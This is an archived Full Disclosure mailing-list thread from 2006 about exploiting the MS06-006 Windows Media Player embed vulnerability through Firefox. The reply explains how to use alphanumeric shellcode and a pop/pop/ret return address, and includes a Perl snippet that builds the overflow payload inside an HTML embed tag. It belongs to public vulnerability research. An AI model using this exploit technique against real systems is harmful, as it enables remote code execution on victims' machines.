Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: MS06-06 Windows Media Player Exploitation
From: H D Moore <fdlist () digitaloffense net>
Date: Thu, 16 Feb 2006 17:23:23 -0600

Still getting some annoying crashes (SEH trick in alphanum code is 
annoying when you are trying to debug something...), but the basic 
solution is:

1) Use alphanumeric shellcode
2) Use a return address that does not have bytes over 0x7F
3) Use a pop/pop/ret and hop over return w/o restricted bytes

my $pattern   = Pex::Text::PatternCreate(16384);        
substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2090, length($shellcode), $shellcode);
$content   = "<html><body><embed src=\"$pattern.wmv\"></body></html>";

Return address is from js3250.dlll in Firefox 1.5.0.1, you should 
auto-target based on the browser version.

-HD

On Thursday 16 February 2006 16:26, c0ntex wrote:
No exploit, just some basic research - anyone with 100% Ascii win32
shellcode?

http://open-security.org/winmedia/index.html

--

regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault